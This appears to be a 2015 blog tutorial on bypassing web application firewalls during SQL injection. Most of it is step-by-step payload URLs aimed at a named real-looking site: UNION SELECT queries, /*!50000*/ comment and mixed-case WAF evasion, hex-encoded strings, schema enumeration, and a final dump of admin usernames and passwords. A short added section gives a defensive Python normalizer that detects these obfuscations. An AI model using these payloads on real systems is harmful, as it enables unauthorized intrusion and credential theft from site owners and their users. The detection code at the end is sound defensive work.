Bypass WAF in SQL injection

Less2. Bypass WAF in SQL injection



Hello friends

Today I will teach you how to bypass a WAF in SQL injection. WAF stands for web application firewall. The WAF filters our injection and stops our query.
So let's start,

This video is only for educational purposes. Hacking is illegal.

Step 1. Find the injection point on any PHP site
(e.g. index.php?id=1, trainers.php?id=2, pageid=2, games.php?id=, porn.php?id= etc.)

Like this site: www.site.com/index.php?id=1

Step 2. After finding it, first check whether the site is vulnerable or not.
I have a site http://www.universecapital.co.in/about_us.php?page_id=11
We will add a single quote (') after ?page_id=11
Like This http://www.universecapital.co.in/about_us.php?page_id=11’
Hit Enter

Step 3. After adding the single quote ('), if the site shows some SQLi error or hides data, that means it is vulnerable.

Step 4. Start the operation on the URL. Now we will count the total number of columns in information_schema.
We will use the ORDER BY query to count the columns.

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=11′ order by 100--
I am putting -- to comment out the rest of the query. It is showing an error or "Unknown column", so
the total number of columns is between 1 and 100.
Now I will decrease my column number.
Step 5. Now I select just the 20th column to shorten the search.
Like this:-     http://www.universecapital.co.in/about_us.php?page_id=11′ order by 20--+
Still an error.
Here the total number of columns is 12, because at 13 there is an error or "Unknown column".

Step 6. Now I am going to use the UNION command to check for vulnerable columns

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ union select all 1,2,3,4,5,6,7,8,9,10,11,12--+

Here UNION is combining both of the queries: the first one is the site's query and the second is my SELECT query.

Here it is not printing the vulnerable columns because there is not sufficient free space to print
the vulnerable columns, so I will hide the site data by using the - sign before the id.

Step 7. Now it is showing an error. Here is the firewall (WAF) that blocks my UNION statement,
so I use a statement like this: /*!50000block statement*/, e.g. /*!50000union*/

Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000UNION*/ALL SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+

Now here the vulnerable columns are 6, 5 and 11.
Now we will fetch all the data using column numbers 5, 11 and 6.
Here are some commands for fetching data from the website:

Variable/Function       Output
@@hostname              Current hostname
@@tmpdir                Temp directory
@@datadir               Data directory
@@version               Version of DB
@@basedir               Base directory
user()                  Current user
database()              Current database
version()               Version
schema()                Current database
UUID()                  System UUID key
current_user()          Current user
current_user            Current user
system_user()           Current system user
session_user()          Session user
@@GLOBAL.have_symlink   Check if symlink is enabled or disabled
@@GLOBAL.have_ssl       Check if it has SSL or not

Step 8. Now find the database name or version using the vulnerable columns.
Like This:-        http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000UNION*/ SELECT ALL 1,2,3,4,version(),6,7,8,9,10,database(),12--+
You see on the website page: Database = 'univerca_universe', Version = '5.5.42-37.1'

Step 9. Now we will fetch the table names
Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ union select all 1,2,3,4,table_name,6,7,8,9,10,11,12 from information_schema.tables --+

information_schema is the collection of databases; here we are fetching all table names from all databases.
Here only one table is shown, but I want all the tables of information_schema, so I use group_concat() to group the tables.

Step 10. Again an error. Now try to bypass the WAF again
Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000table_name*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables --+

Step 11. But I want table names only from the current database, so now we will set a WHERE condition.

Like This:-  http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000group_concat(table_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Step 12. Again the WAF is here; it blocks some of my query (group_concat), so I try converting it to mixed small and capital letters

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Now these are all the tables of the database.

Step 13. Now I am unable to see all the tables, so I will use the <br> tag to print the table names on separate lines.

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name,<br>)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Hit Enter. We are shown an error. We need to encode the <br> tag as 0xHEX: <br> = 0x3c62723e

Like This:- http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(table_name,0x3c62723e)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.tables where table_schema=database() --+

Step 14. Now I fetch the table named 'admin'

Like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(column_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.columns where table_name=admin --+

Oops, here is the firewall that blocks the table_name=admin fetching.
Now I will encode admin_login with mysql_char().

Like This= http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(column_name)*/,6,7,8,9,10,11,12 /*!50000from*/ information_schema.columns where table_name=0x61646d696e --+

We got the admin columns.

Step 15. Now I fetch the juicy data, that is username and password

like This:-http://www.universecapital.co.in/about_us.php?page_id=-11′ /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,/*!50000gRoUp_cOnCat(username,0x3a,password)*/,6,7,8,9,10,11,12 /*!50000from*/ admin --+

In this step I use 0x3a to divide the name and password (:). And remember, don't forget to decode the admin hex back to normal text in the final step.
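Added example (not part of the original post): a defender-side normalizer in Python that undoes the obfuscations walked through in steps 7 to 14 (versioned /*!50000 ... */ comments, mixed case, 0x hex literals, --+ terminators) before a detection rule looks at the query, run over constructed sample request lines. The rule names, the samples and the analyze() function are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines in the style of the payloads above (not real log data).
SAMPLE_REQUESTS = [
    "/about_us.php?page_id=11",
    "/about_us.php?page_id=-11' /*!50000uNiOn*/ /*!50000select*/ all 1,2,3,4,"
    "/*!50000gRoUp_cOnCat(table_name,0x3c62723e)*/,6 /*!50000from*/ "
    "information_schema.tables where table_schema=database() --+",
    "/about_us.php?page_id=-11%27%20/*!50000UNION*/ALL%20SELECT+1,2,3,4,5,6--+",
    "/search.php?q=union+station+select+shop",   # benign: keywords present, no SQL shape
]

VERSIONED_COMMENT = re.compile(r"/\*!\d{5}(.*?)\*/", re.S)   # MySQL executes the inner text
HEX_LITERAL = re.compile(r"0x([0-9a-f]+)\b")

def _decode_hex(m: "re.Match") -> str:
    digits = m.group(1)
    if len(digits) % 2:            # odd length is a number, not a byte string
        return m.group(0)
    return bytes.fromhex(digits).decode("latin-1")   # 0x61646d696e -> admin

def normalize(query: str) -> str:
    """Reduce a request to the query MySQL would actually see."""
    s = unquote_plus(query)                      # %27 -> ', and + -> space (so --+ becomes -- )
    s = VERSIONED_COMMENT.sub(r" \1 ", s)        # /*!50000UNION*/ALL -> UNION ALL
    s = s.lower()                                # uNiOn -> union
    s = HEX_LITERAL.sub(_decode_hex, s)          # 0x3c62723e -> <br>
    return re.sub(r"\s+", " ", s)

# Rules are matched against the normalized form, so case tricks and comments do not hide them.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "comment_terminator": re.compile(r"--\s*$|#\s*$"),
    "quote_break": re.compile(r"=-?\d+'"),       # id value followed by a stray quote
}

def analyze(request_line: str) -> list:
    """Return the names of the rules the (normalized) request triggers."""
    norm = normalize(request_line)
    return [name for name, rx in RULES.items() if rx.search(norm)]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(analyze(line) or "clean", "<-", line[:60])
```

The benign search line is the important negative case: matching on the word "union" alone would flag it, matching on the normalized SQL shape does not.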
Reviewed by Unknown on 12/09/2015